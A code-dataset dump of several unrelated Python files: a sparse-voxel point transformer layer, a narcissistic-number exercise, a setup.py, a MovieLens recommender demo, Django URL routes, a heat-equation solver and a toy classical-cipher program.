ME.MinkowskiBatchNorm(self.hidden_dim) if self.use_bn else nn.Identity(),\n# ME.MinkowskiReLU(),\n# ME.MinkowskiConvolution(self.hidden_dim, self.out_dim, kernel_size=1, dimension=3),\n# ME.MinkowskiBatchNorm(self.out_dim) if self.use_bn else nn.Identity()\n# )\n self.gamma = nn.Sequential(\n nn.Conv1d(self.out_dim, self.hidden_dim, 1),\n nn.BatchNorm1d(self.hidden_dim) if self.use_bn else nn.Identity(),\n nn.ReLU(),\n nn.Conv1d(self.hidden_dim, self.vector_dim, 1),\n nn.BatchNorm1d(self.vector_dim) if self.use_bn else nn.Identity()\n )\n self.delta = nn.Sequential(\n nn.Conv2d(3, self.hidden_dim, 1),\n nn.BatchNorm2d(self.hidden_dim) if self.use_bn else nn.Identity(),\n nn.ReLU(),\n nn.Conv2d(self.hidden_dim, self.out_dim, 1),\n nn.BatchNorm2d(self.out_dim) if self.use_bn else nn.Identity()\n )\n\n if self.pre_ln:\n self.ln_top = nn.LayerNorm(self.in_dim)\n self.ln_attn = nn.LayerNorm(self.hidden_dim)\n self.ln_down = nn.LayerNorm(self.out_dim)\n # @Niansong: Minkowski doesn't seem to have layer norm, I'm using InstanceNorm instead\n # self.in_top = ME.MinkowskiInstanceNorm(self.in_dim)\n # self.in_attn = ME.MinkowskiInstanceNorm(self.hidden_dim)\n # self.in_down = ME.MinkowskiInstanceNorm(self.out_dim)\n\n # TODO: what r should we use? I'm using 10 as default for now, perhaps too large for ModelNet40\n self.cube_query = cube_query(r=self.r, k=n_sample)\n\n\n def forward(self, x : ME.SparseTensor):\n '''\n input_p: B, 3, npoint\n input_x: B, in_dim, npoint\n '''\n\n PT_begin = time.perf_counter()\n self.B = (x.C[:,0]).max().item() + 1 # batch size\n\n npoint, in_dim = tuple(x.F.size())\n k = min(self.n_sample, npoint)\n self.k = k\n h = self.nhead\n res = x\n\n # however the knn still gives 16 idxs\n # DEBUG: when using the r = 5, sometimes there is error\n if npoint <= self.n_sample:\n self.cube_query = cube_query(r=self.r, k=k)\n\n neighbor, mask = self.cube_query.get_neighbor(x, x)\n # neighbor: [B*npoint, k, bxyz]\n # mask: [B*npoint, k]\n \n if self.pre_ln:\n x = self.ln_top(x)\n\n x = self.linear_top(x) # [B, in_dim, npoint], such as [16, 32, 4096]\n\n if self.pre_ln:\n x = self.in_attn(x)\n\n # illustration on dimension notations:\n # - B: batch size\n # - nvoxel: number of all voxels of the whole batch\n # - k: k neighbors\n # - feat_dim: feature dimension, or channel as others call it\n # - nvoxel_batch: the maximum voxel number of a single SparseTensor in the current batch\n\n phi = self.phi(x).F # (nvoxel, feat_dim)\n phi = phi[:,None,:].repeat(1,k,1) # (nvoxel, k, feat_dim)\n\n psi = get_neighbor_feature(neighbor, self.psi(x)) # (nvoxel, k, feat_dim)\n # @Niansong: psi is the feature of each voxel's k neighbors\n alpha = get_neighbor_feature(neighbor, self.alpha(x)) # (nvoxel, k, feat_dim)\n \n\n\n try:\n relative_xyz = neighbor - x.C[:,None,:].repeat(1,k,1) # (nvoxel, k, bxyz), we later pad it to [B, xyz, nvoxel_batch, k]\n except RuntimeError:\n import ipdb; ipdb.set_trace()\n\n WITH_POSE_ENCODING = True\n if WITH_POSE_ENCODING:\n\n relative_xyz[:,0,0] = x.C[:,0] # get back the correct batch index, because we messed batch index in the subtraction above\n # since each batch could have different number of voxels, we need to pad them\n relative_xyz = pad_zero(relative_xyz, mask) # [B, xyz, nvoxel_batch, k]\n # @Niansong: a further illustration on batch_mask:\n # type: dict, content: {batch_idx : num of voxel}\n pose_encoding = self.delta(relative_xyz.float()) # (B, feat_dim, nvoxel_batch, k)\n # now we squeeze pose_encoding to (nvoxel, hidden_size, k), this should correspond to k SparseTensors\n # it is the positional encoding for each of the k neighbors\n\n time_begin = time.perf_counter()\n pose_tensor = make_position_tensor(pose_encoding, mask, x.C.shape[0]) # (nvoxel, k, feat_dim)\n\n time_end = time.perf_counter()\n # print('Overall took {}ms'.format((time_end - time_begin)*1e3))\n\n if self.use_vector_attn:\n # the attn_map: [vector_dim];\n # the alpha: [out_dim]\n # attn_map = F.softmax(self.gamma(phi - psi + pos_encoding), dim=-1) # [B, in_dim, npoint, k], such as [16, 32, 4096, 16]\n # y = attn_map.repeat(1, self.out_dim // self.vector_dim,1,1)*(alpha + pos_encoding) # multiplies attention weight\n # self.out_dim and self.vector_dim are all 32 here, so y is still [16, 32, 4096, 16]\n # y = y.sum(dim=-1) # feature aggregation, y becomes [B, out_dim, npoint]\n\n if WITH_POSE_ENCODING:\n gamma_input = phi - psi + pose_tensor # (nvoxel, k, feat_dim)\n else:\n gamma_input = phi - psi # (nvoxel, k, feat_dim)\n gamma_input = gamma_input.permute(0, 2, 1) # (nvoxel, feat_dim, k)\n attn_map = F.softmax(self.gamma(gamma_input), dim=-1) # (nvoxel, feat_dim, k)\n if WITH_POSE_ENCODING:\n self_feat = (alpha + pose_tensor).permute(0,2,1) # (nvoxel, k, feat_dim) -> (nvoxel, feat_dim, k)\n else:\n self_feat = (alpha).permute(0,2,1) # (nvoxel, k, feat_dim) -> (nvoxel, feat_dim, k)\n y = attn_map.repeat(1, self.out_dim // self.vector_dim, 1, 1) * self_feat # (nvoxel, feat_dim, k)\n y = y.sum(dim=-1).view(x.C.shape[0], -1) # feature aggregation, y becomes (nvoxel, feat_dim)\n y = ME.SparseTensor(features = y, coordinate_map_key=x.coordinate_map_key, coordinate_manager=x.coordinate_manager)\n else:\n #phi = phi.reshape(B, h, self.out_dim//h, npoint, k)\n #psi = psi.reshape(B, h, self.out_dim//h, npoint, k)\n #attn_map = F.softmax((phi*psi).reshape(B, self.out_dim, npoint, k) + pos_encoding, dim=-1)\n #y = attn_map*(alpha+pos_encoding)\n #y = y.sum(dim=-1)\n pass\n\n \n if self.pre_ln:\n y = self.ln_down(y.transpose(1,2)).transpose(1,2)\n\n y = self.linear_down(y)\n\n PT_end = time.perf_counter()\n # print('PT blocks: {}ms'.format((PT_end - PT_begin)*1e3))\n\n return y+res, attn_map.detach().cpu().data\n\n\ndef make_position_tensor(pose_encoding : torch.Tensor, mask : torch.Tensor, nvoxel : int):\n \"\"\"\n Mask positional encoding into k ME.SparseTensors\n\n Input:\n pose_encoding: (B, feat_dim, nvoxel_batch, k)\n batch_tensor: (B, N)\n \"\"\"\n # import ipdb; ipdb.set_trace()\n\n\n\n B, feat_dim, nvoxel_batch, k = pose_encoding.shape\n pose_encoding = pose_encoding.permute(0, 2, 3, 1) # (B, feat_dim, nvoxel_batch, k) -> (B, nvoxel_batch, k, feat_dim)\n\n masked_encoding = torch.zeros([nvoxel, k, feat_dim], device=pose_encoding.device).int()\n\n nums = mask.sum(-1)\n nvoxels = nums.repeat(nums.shape[0],1).tril().sum(dim=1)\n # nvoxels_leftshift = torch.cat([torch.zeros([]), nvoxels[:-1]])\n nvoxels_leftshift = nvoxels.roll(shifts=1)\n nvoxels_leftshift[0] = 0\n\n begin = time.perf_counter()\n torch.cuda.synchronize()\n end = time.perf_counter()\n\n '''\n pack the idxes to use the scatter/gather\n '''\n\n indexs_ = torch.cat([torch.arange(nums[i])+i*nvoxel_batch for i in range(len(nums))])\n\n import ipdb; ipdb.set_trace()\n\n for batch_idx in range(B):\n torch.cuda.synchronize()\n\n tick1 = time.perf_counter()\n\n # num = nums[batch_idx]\n masked_encoding[nvoxels_leftshift[batch_idx]:nvoxels[batch_idx], :, :] = pose_encoding[batch_idx, :nums[batch_idx], :, :] # @Niansong: feels wierd that we just throw away some feature\n # voxel_idx += num\n tick4 = time.perf_counter()\n # print('for-loop took {}ms'.format((tick4 - tick1)*1e3))\n\n print('Overall took {}ms'.format((end - begin)*1e3))\n\n\n # print('Overall took {}%'.format((tick3 - tick2)/(tick4 - tick1)))\n return masked_encoding # (nvoxel, k, feat_dim)\n\ndef get_neighbor_feature(neighbor: torch.Tensor, x: ME.SparseTensor):\n \"\"\"\n fetch neighbor voxel's feature tensor.\n Input:\n neighbor: torch.Tensor [B*npoint, k, xyz]\n x: ME.SparseTensor\n \"\"\"\n B_npoint, k, _ = tuple(neighbor.size())\n neighbor = neighbor.view(-1, 4).float() # [B*npoint*k, bxyz]\n features = x.features_at_coordinates(neighbor)\n _, dim = features.shape\n features = features.view(-1, k, dim)\n return features\n\ndef pad_zero(tensor : torch.Tensor, mask: torch.Tensor):\n # input is [B*npoint, k, bxyz], we want [B, xyz, npoint, k]\n # need to pad zero because each batch may have different voxel number\n # B = int(max(tensor[:,0,0]).item() + 1)\n # k = tuple(tensor.shape)[1]\n B, N = mask.shape\n _, k, bxyz = tensor.shape\n result = torch.zeros([B, N, k, 4], dtype=torch.int, device=tensor.device)\n pointer = 0\n for b_idx in range(B):\n nvoxel = mask.sum(-1)[b_idx]\n result[b_idx, :nvoxel, :, :] = tensor[pointer:pointer+nvoxel, :, :]\n pointer += nvoxel\n result = result[:,:,:,1:] # (B, N, k, 3)\n result = result.permute(0, 3, 1, 2) # (B, N, k, 3) -> (B, 3, N, k)\n return result\n\n\n\ndef manhattan_dist(dxyz: tuple):\n dxyz = [abs(v) for v in dxyz]\n return sum(dxyz[1:])\n\ndef separate_batch(coord: torch.Tensor):\n \"\"\"\n Input:\n coord: (N, 4) coordinate tensor, coord=b,x,y,z\n Return:\n tensor: (B, N, 3), batch index separated\n mask: (B, N), 1->valid, 0->invalid\n \"\"\"\n B = (coord[:,0].max().item() + 1)\n # B = max(coord[:,0]).item() + 1\n\n batch_ids = coord[:,0]\n\n # get the splits of different i_batchA\n splits_at = torch.stack([torch.where(batch_ids == i)[0][-1] for i in torch.unique(batch_ids)]).int() # iter at i_batch_level\n splits_at_leftshift_one = torch.cat([torch.tensor([0.]).to(coord.device) , splits_at[:-1]], dim=0).int()\n len_per_batch = splits_at - splits_at_leftshift_one\n len_per_batch[0] = len_per_batch[0]+1 # DBEUG: stupid fix since 0~1566 has 1567 values\n N = len_per_batch.max().int().item()\n\n mask = torch.zeros(B, N, device=coord.device).long()\n new_coord = torch.zeros([B, N, 3]).int().to(coord.device) # (B, N, xyz)\n\n # TODO: maybe use torch.scatter could further boost speed here?\n for i_bs in range(B):\n if i_bs == 0:\n new_coord[i_bs][:len_per_batch[i_bs]] = coord[splits_at_leftshift_one[i_bs]:splits_at[i_bs]+1,1:]\n mask[i_bs][:len_per_batch[i_bs]] = 1\n else:\n new_coord[i_bs][:len_per_batch[i_bs]] = coord[splits_at_leftshift_one[i_bs]:splits_at[i_bs],1:]\n mask[i_bs][:len_per_batch[i_bs]] = 1\n\n\n # mask = (new_coord>0).int()[:,:,0] # dirty fix of making [B,N,3] -> [B,N], since xyz should have same mask\n dat = new_coord\n\n '''\n voxeln = dict() # number of voxels of each object in the batch\n for b_idx in coord[:,0]:\n b_idx = int(b_idx)\n if not b_idx in voxeln: voxeln[b_idx] = 0\n voxeln[b_idx] += 1\n # TODO: since dict is on cpu, so slow, should fix em\n N = max(voxeln.values())\n # N = max(voxeln.items(), key=operator.itemgetter(1))[1]\n dat = torch.zeros([B, N, 3]).int().to(coord.device) # (B, N, xyz)\n mask = torch.zeros([B, N]).int().to(coord.device) # (B, N)\n axis_idx = 0\n while axis_idx < coord.shape[0]:\n batch_idx = coord[axis_idx,0].item()\n num = voxeln[batch_idx]\n dat[batch_idx, 0:num, :] = torch.clone(coord[axis_idx:axis_idx+num, 1:])\n mask[batch_idx, 0:num] = 1\n axis_idx += num\n '''\n\n return dat, mask\n\ndef apply_coord_mask(indices, mask):\n \"\"\"\n Input:\n indices: a tuple of three torch.Tensor (B-list, N-list, N-list)\n mask: torch.Tensor (B, N)\n \"\"\"\n b_list = list()\n n1_list = list()\n n2_list = list()\n for idx in range(len(indices[0])):\n b = indices[0][idx].item()\n n1 = indices[1][idx].item()\n n2 = indices[2][idx].item()\n if mask[b][n1] == 0 or mask[b][n2] == 0: continue\n b_list.append(b)\n n1_list.append(n1)\n n2_list.append(n2)\n\n return (torch.tensor(b_list).long(), torch.tensor(n1_list).long(), torch.tensor(n2_list).long() )\n\n\n# cube query for sparse tensors\nclass cube_query(object):\n \"\"\"\n Cube query for ME.SparseTensor\n ref : ME.SparseTensor, coord dim = [B * nr, 3]\n reference sparse tensor\n query: ME.SparseTensor, coord dim = [B * nq, 3]\n query sparse tensor, whose neighbors we are look for\n return:\n result: torch.Tensor [B * nq, k, 4], 4 is B,x,y,z\n mask: torch.Tensor [B * nq, k], zero means less than k neighbors\n\n __init__():\n input:\n r: cube query radius\n k: k neighbors\n \"\"\"\n def __init__(self, r, k):\n self.r = r\n self.k = k\n\n def get_neighbor(self, ref : ME.SparseTensor, query : ME.SparseTensor):\n\n # make ref's coord list a hash set\n # ref_set = set()\n # for i in range(B_nr):\n # coord_tuple = tuple([v.item() for v in ref.C[i] ] )\n # ref_set.add(coord_tuple)\n # build return tensorA\n\n B_nq, _ = query.C.shape\n\n # result = torch.zeros([B_nq, self.k, 4]).to(query.device)\n # mask = torch.ones([B_nq, self.k]).to(query.device)\n # use torch tensor\n # directly operate on query.C cuda tensor\n # (nvoxel_q, 4) -> (nvoxel_q, 21*21*21, 4)\n # neighbors = query.C[:,None,:].repeat(1,(self.r*2+1)**3,1)\n # offset = torch.tensor([ (0,) + tuple(it) for it in itertools.product(range(-self.r,self.r+1), repeat=3) ]).to(query.C.device)\n # offset = offset[None,:,:].repeat(B_nq,1,1) # (nvoxel_q, cube_n, bxyz)\n # neighbors = neighbors + offset\n\n batch_begin = time.perf_counter()\n\n coord = query.C # (N, 4)\n coord, mask = separate_batch(coord) # (b, n, 3)\n b, n, _ = coord.shape\n\n batch_end = time.perf_counter()\n # print('Batch packing tooks {}'.format((batch_end - batch_begin)*1e3))\n\n '''\n use pointnet++ like operation to acquire the idxes\n '''\n # time_begin = time.perf_counter()\n\n knn_begin = time.perf_counter()\n\n query_and_group_cuda = QueryAndGroup(radius=self.r, nsample=self.k, use_xyz=False)\n coord = coord.float()\n idxs = query_and_group_cuda(\n xyz=coord,\n new_xyz=coord,\n features=coord.transpose(1,2).contiguous(),\n ) # idx: [bs, xyz, npoint, nsample]\n idxs = idxs.permute([0,2,3,1]) # idx: [bs, npoint, nsample, xyz]\n result_padded = idxs\n\n knn_end = time.perf_counter()\n # print('KNN tooks {}'.format((knn_end - knn_begin)*1e3))\n\n # time_end = time.perf_counter()\n # print('took {} ms'.format((time_end - time_begin)*1e3))\n\n\n # extended_coord = coord.unsqueeze(2).repeat(1,1,coord.shape[1],1)\n # diff = torch.abs(coord.unsqueeze(2) - coord.unsqueeze(1)) # (b, n, n, 3)\n # # (b, n, 1, 3) - (b, 1, n, 3)\n # diff = diff.sum(dim=-1)\n # indices = torch.argsort(diff, dim=-1)[:,:,:self.k] # (b,n,k)\n\n '''\n older_version\n\n indices = torch.where(diff <= self.r) # we can reshape it to (b, n, n)\n #masked_indices = apply_coord_mask(indices, mask)\n # neighbors = coord[indices]\n\n # if there's not enough k neighbors, we fill with random neighbors\n # centers = coord[masked_indices[0], masked_indices[1]] # (pair number, 3)\n # neighbors = coord[masked_indices[0], masked_indices[2]] # (pair number, 3)\n\n # TODO: FIX here, maybe cant reshape\n result_padded = torch.zeros([b, n, self.k, 3]).int().to(diff.device) # (b, n, k, 3)\n neighbors = coord[indices[0], indices[2]].reshape(diff.shape[0], diff.shape[1], diff.shape[2], 3) # (b, n, n, 3)\n if min(mask.sum(dim=-1)) >= self.k:\n # if there are guaranteed more than k voxels in the object\n result_padded = neighbors[:,:,self.k,:]\n else:\n # if there are less than k voxels in the object, we have to fill k neighbors with repeated voxels\n # we have to loop through batch because each object has different voxel number\n for b in range(diff.shape[0]):\n n = mask.sum(dim=-1)[b]\n pointer = 0\n while pointer < self.k:\n end = min(pointer + n, self.k)\n result_padded[b,:,pointer:end,:] = neighbors[b,:,:min(n, self.k-pointer),:]\n pointer += n\n '''\n # unpad result (b, n, k, 3) -> (B_nq, k, 4) by applying mask\n pack_begin = time.perf_counter()\n\n result = torch.zeros([B_nq, self.k, 4], dtype=torch.int32, device=query.device)\n pointer = 0\n for b_idx in range(result_padded.shape[0]):\n n = mask.sum(dim=-1)[b_idx]\n result[pointer:pointer+n, :, 1:] = result_padded[b_idx,:n, :, :]\n result[pointer:pointer+n, :, 0] = b_idx\n pointer += n\n\n pack_end = time.perf_counter()\n # print('Pack tooks {}'.format((pack_end - pack_begin)*1e3))\n\n# for i in range(B_nq):\n# # neighborhood\n# # n, x, y, z = query.C[i][0].item(), query.C[i][1].item(), query.C[i][2].item(), query.C[i][3].item()\n# n, x, y, z = [v.item() for v in query.C[i]]\n# neighbor = list()\n## offset_loop_start = time.perf_counter()\n## hash_time = 0\n# # we need to optimize this loop, it costs around 10 ms\n## for offset in itertools.product(range(-self.r, self.r+1), repeat=3):\n## if offset == (0,0,0): continue # skip center\n## nb = tuple(sum(x) for x in zip(offset, (x,y,z))) # a neighbor voxel's coordinate\n## nb = (n, *nb) # don't forget batch index \n## hash_start = time.perf_counter()\n## if nb in ref_set: neighbor.append((nb, manhattan_dist(offset) ) ) # a tuple: (coord, manhattan distance)\n## hash_end = time.perf_counter()\n## hash_time += hash_end - hash_start\n## offset_loop_end = time.perf_counter()\n## print(f\"offset loop : {(offset_loop_end - offset_loop_start)*1e3} ms\") # about 13 ms\n## print(f\" hash time: {hash_time*1e3} ms\") # about 1 ms\n#\n# # try vectorization with numpy\n# offset = np.mgrid[-self.r:self.r+1, -self.r:self.r+1, -self.r:self.r+1]\n# offset[0] += x; offset[1] += y; offset[2] += z\n# offset = np.transpose(offset, (1,2,3,0))\n# vec_start = time.perf_counter()\n# # offset (20,20,20,3) \n# cond = [(n,) + tuple(offset[it]) in ref_set for it in itertools.product(range(-self.r,self.r+1), repeat=3)]\n# # this condition building is slow ~13ms\n# vec_end = time.perf_counter()\n# cond = np.reshape(cond, (2*self.r+1, 2*self.r+1, 2*self.r+1))\n# masked = np.where(cond)\n# nb_array = offset[masked[0], masked[1], masked[2]]\n# print(f\"vectorized mask time : {(vec_end-vec_start)*1e3}\")\n# for idx in range(nb_array.shape[0]):\n# nb = (n,) + tuple(nb_array[idx,:])\n# neighbor.append((nb, manhattan_dist((nb[0], nb[1]-x, nb[2]-y, nb[3]-z)) ) )\n# # sort neighbor according to manhattan distance\n# neighbor = sorted(neighbor, key=lambda t : t[1])\n# for k_idx in range(self.k):\n# if k_idx > len(neighbor)-1 :\n# mask[i][k_idx] = 0\n# continue\n# bxyz = neighbor[k_idx][0]\n# result[i][k_idx] = torch.tensor([*bxyz])\n return result, mask\n\nif __name__ == \"__main__\":\n import torch\n import MinkowskiEngine as ME\n feature = torch.tensor([[0.2, 0.3], [0.4, 0.5]])\n coord =torch.tensor([[0.6, 0.8, 0.3], [0.4, 0.3, 0.5]])\n x = ME.SparseTensor(\n features = feature,\n coordinates = ME.utils.batched_coordinates([coord / 0.1])\n )\n cq = cube_query(1, 2)\n result, mask = cq.get_neighbor(x, x)\n","sub_path":"model/pct_voxel_utils.py","file_name":"pct_voxel_utils.py","file_ext":"py","file_size_in_byte":31728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"34985596","text":"# 求出所有的水仙花数,并输出。\ndef narcissistic_number():\n \"\"\"\n\n rtype: 返回一个list,其中包含了所有的水仙花数\n \"\"\"\n result = []\n for i1 in range(0, 10):\n for i2 in range(0, 10):\n for i3 in range(0, 10):\n num = i1 * 100 + i2 * 10 + i3\n if 100 <= num == pow(i1, 3) + pow(i2, 3) + pow(i3, 3):\n result.append(num)\n return result\n\n\nprint(narcissistic_number())\n","sub_path":"file/course/experience2/实验二/实验二/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519402165","text":"import glob\nimport imp\nfrom setuptools import setup, find_packages, Extension\nfrom codecs import open # To use a consistent encoding\nfrom os import path\nimport sys\n\nMETA = imp.load_source('meta', path.join('.', 'postgis', '__meta__.py'))\n\nHERE = path.abspath(path.dirname(__file__))\n\n# Get the long description from the relevant file\nwith open(path.join(HERE, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\ndef is_pkg(line):\n return line and not line.startswith(('--', 'git', '#'))\n\n\ndef list_modules(dirname):\n filenames = glob.glob(path.join(dirname, '*.py'))\n\n module_names = []\n for name in filenames:\n module, ext = path.splitext(path.basename(name))\n if module != '__init__':\n module_names.append(module)\n\n return module_names\n\nwith open('requirements.txt', encoding='utf-8') as reqs:\n install_requires = [l for l in reqs.read().split('\\n') if is_pkg(l)]\n\ntry:\n from Cython.Distutils import build_ext\n CYTHON = True\nexcept ImportError:\n sys.stdout.write('\\nNOTE: Cython not installed. psycopg-postgis will '\n 'still work fine, but may run a bit slower.\\n\\n')\n CYTHON = False\n cmdclass = {}\n ext_modules = []\nelse:\n ext_modules = [\n Extension('postgis.' + ext, [path.join('postgis', ext + '.py')])\n for ext in list_modules(path.join(HERE, 'postgis'))]\n\n cmdclass = {'build_ext': build_ext}\n\n\nsetup(\n name='psycopg-postgis',\n version=META.__version__,\n description=META.__doc__,\n long_description=long_description,\n url=META.__homepage__,\n author=META.__author__,\n author_email=META.__contact__,\n license='WTFPL',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 4 - Beta',\n\n 'Intended Audience :: Developers',\n 'Topic :: Scientific/Engineering :: GIS',\n\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n keywords='psycopg postgis gis',\n packages=find_packages(exclude=['tests']),\n install_requires=install_requires,\n extras_require={'test': ['pytest'], 'docs': 'mkdocs'},\n include_package_data=True,\n cmdclass=cmdclass,\n ext_modules=ext_modules,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501400961","text":"from torch.utils.data import DataLoader, Dataset\nfrom divmachines.logging import TrainingLogger as TLogger\nfrom torch.optim.adam import Adam\nfrom tqdm import tqdm\nfrom divmachines.topk.lfp import FM_LFP\nfrom divmachines.classifiers import FM\nimport numpy as np\nimport pandas as pd\nfrom divmachines.utility.helper import cartesian2D\nimport os\n\nUPL = 3\nN_JOBS = 3\nN_ITER = 10\nTOP = 5\nFACTORS = 10\nUSERS_BATCH = 10\nLEARNING_RATE = .001\nBATCH_SIZE = 2048\nVERBOSE = True\nUSE_CUDA = False\nSPARSE = False\nSTOP = True\nTRIPLETS_PATH = './../../../../../data/ua.base'\nGENRE_PATH = './../../../../../data/u.item'\nHEADER = \"item | movie_title | release_date | video_release_date | \" \\\n \"IMDb_URL | unknown | Action | Adventure | Animation | Children's | \" \\\n \"Comedy | Crime | Documentary | Drama | Fantasy | Film-Noir | Horror | \" \\\n \"Musical | Mystery | Romance | Sci-Fi | Thriller | War | Western \"\nMODEL_PATH = \"./saveme.pth.tar\"\nground_path = \"ground-upl\" + str(UPL) + \".csv\"\ntrain_path = \"train-upl\" + str(UPL) + \".csv\"\n\n\nHEADER = HEADER.replace(\" |\", \"\")\nHEADER = HEADER.split()\nproj = ['user', 'item']\nproj.extend(HEADER[5:])\nproj.append('rating')\n\nif not os.path.exists(MODEL_PATH):\n data = pd.read_csv(TRIPLETS_PATH, sep=\"\\t\", names=['user', 'item', 'rating', 'time'])\n items = pd.read_csv(GENRE_PATH, sep=\"|\", names=HEADER, encoding='iso-8859-2')\n train = pd.merge(data, items, on='item', how='inner')[proj]\n n_users = np.unique(train[[\"user\"]].values).shape[0]\n n_items = np.unique(train[[\"item\"]].values).shape[0]\n\n # Train-test Split\n users = train.user.unique()\n np.random.shuffle(users)\n train_users_mask = int(users.shape[0]*0.8)\n train_users = users[0:train_users_mask]\n test = train.loc[~train.user.isin(train_users)]\n train = train.loc[train.user.isin(train_users)]\n\n dr = test.groupby('user', as_index=False) \\\n .apply(lambda g: g.sample(2)).reset_index(0, drop=True)\n\n # Create Ground Truth\n # ground = test[test.user_id != dr.user_id & (test.tps_id != dr.tps_id)]\n ground = test[~test.index.isin(dr.index)].dropna()\n train = pd.concat((train, dr))\n\n print(\"Number of users: %s\" % n_users)\n print(\"Number of items: %s\" % n_items)\n\n logger = TLogger()\n\n model = FM_LFP(n_iter=N_ITER,\n optimizer_func=Adam,\n n_jobs=N_JOBS,\n n_factors=FACTORS,\n batch_size=BATCH_SIZE,\n learning_rate=LEARNING_RATE,\n use_cuda=USE_CUDA,\n verbose=VERBOSE,\n sparse=SPARSE,\n logger=logger,\n early_stopping=STOP)\n\n interactions = train.values\n x = interactions[:, :-1]\n y = interactions[:, -1]\n\n model.fit(x, y, dic={'users': 0, 'items': 1},\n n_users=n_users, n_items=n_items)\n\n model.save(MODEL_PATH)\n train.to_csv(train_path, index=USE_CUDA)\n ground.to_csv(ground_path, index=USE_CUDA)\n\nmodel = FM_LFP(n_iter=N_ITER,\n model=MODEL_PATH,\n n_jobs=N_JOBS,\n batch_size=BATCH_SIZE,\n n_factors=FACTORS,\n learning_rate=LEARNING_RATE,\n use_cuda=USE_CUDA,\n verbose=VERBOSE,\n sparse=SPARSE)\n\ntrain = pd.read_csv(train_path, header=0)\nground = pd.read_csv(ground_path, header=0)\n\ndataset = pd.concat((train, ground))\nusers = dataset.user.unique()\nitem_catalogue = dataset[proj[1:-1]].drop_duplicates().values\n\nvalues = cartesian2D(users.reshape(-1, 1), item_catalogue)\n\nmodel0 = FM(n_iter=N_ITER,\n model=MODEL_PATH,\n n_jobs=N_JOBS,\n batch_size=BATCH_SIZE,\n n_factors=FACTORS,\n learning_rate=LEARNING_RATE,\n use_cuda=USE_CUDA,\n verbose=VERBOSE,\n sparse=SPARSE)\n\nrank = model0.predict(values) \\\n .reshape(users.shape[0], item_catalogue.shape[0])\n\n\nfor b in tqdm([1.0], desc=\"sys.div.\", leave=False):\n table = np.zeros((users.shape[0], TOP + 1), dtype=np.object)\n table[:, 0] = users\n table[:, 1:] = model.predict(values, top=TOP, b=b, rank=rank)\n np.savetxt(\"./results-b\"+str(b), table, fmt=\"%s\")\n","sub_path":"divmachines/demo/topk/lfp/fm/movielens.py","file_name":"movielens.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"72661502","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom .views import (\n\tPostListView, \n\tPostDetailView,\n\tPostCreateView,\n\tPostUpdateView,\n\tPostDeleteView, \n\t)\n\nfrom . import views\n\nurlpatterns = [\n path('', PostListView.as_view(), name='blog-art_design'),\n path('Inspiration/', views.inspiration, name='blog-inspiration'), \n path('About/', views.about, name='blog-about'),\n path('post//', PostDetailView.as_view(), name='post-detail'),\n path('post/new/', PostCreateView.as_view(), name='post-create'),\n path('post//update/', PostUpdateView.as_view(), name='post-update'),\n path('post//delete/', PostDeleteView.as_view(), name='post-delete')\n ]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"437519168","text":"import time\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits import mplot3d\r\nimport numpy as np\r\n\r\n# A roll of steel 100C at left end and 25C at right end, length = 0.05m\r\n# find temperature variation from t=0 to t=9s\r\n\r\ndef uniform_grid(lims, n):\r\n rng = lims[1]-lims[0]\r\n delx=rng/n\r\n\r\n xm = [0 for i in range(n+1)]\r\n for i in range(n):\r\n xm[i+1] = xm[i]+delx\r\n\r\n return(xm,delx)\r\n\r\ndef disp(x):\r\n for i in range(len(x)):\r\n print(x[i])\r\n\r\ndef gauss_elm(A,B):\r\n n= len(B)\r\n # step 1: Gaussian elimination.\r\n i=0\r\n while i < n:\r\n # pivots\r\n pivot = A[i][i]\r\n j=i+1\r\n while j=0:\r\n sum = 0\r\n k=i+1\r\n while k 0:\n currentdate = time.strftime('%y%m%d', time.localtime(time.time()))\n currenttime = time.strftime('%H%M%S', time.localtime(time.time()))\n \n if not os.path.exists(keydir):\n os.mkdir(keydir)\n if not os.path.exists(keydir + '/' + currentdate):\n os.mkdir(keydir + '/' + currentdate)\n \n filename = keydir + '/' + currentdate + '/' + currenttime + '.json'\n save(filename, content)\n times = times - 1\n\n if not os.path.isfile(filename):\n continue\n else:\n return None\n\n print('The contents can not save as file!')\n return None\n\ndef main():\n plaintext = input('Please enter the plaintext: ')\n if not plaintext.isalpha():\n return None\n\n method = menu()\n while True:\n if method == '1':\n key = 0\n while True: \n key = input('Please enter a number as a key(0 - 25): ')\n if key.isdigit():\n break\n else:\n continue\n\n ciphertext = Caesarcipher(plaintext, int(key), 'encrypt')\n break\n elif method == '2':\n keytable = createtable(upperletters)\n ciphertext = encrypts(plaintext, keytable)\n break\n elif method == '3':\n key = createkeys()\n ciphertext = createciphertext(plaintext, key)\n break\n elif method == '0':\n return None\n else:\n print('Input Error!\\n')\n method = menu()\n continue\n\n print('Your ciphertext is %s' % ciphertext)\n \n savecipher = input('Do you want to save ciphertexts?(y/n): ')\n if savecipher == 'y':\n savefile(ciphertext, ciphertexts)\n \n if method == '2':\n savetable = input('Do you want to save the substitution table?(y/n): ')\n if savetable == 'y':\n savefile(keytable, keytables)\n\n if method == '3':\n savetable = input('Do you want to save the key?(y/n): ')\n if savetable == 'y':\n savefile(key, keys)\n\n return None\n\ndef menu():\n print('''\n================ Menu ================\n| 1. Caesar Cipher |\n| 2. Simple Substitution Cipher 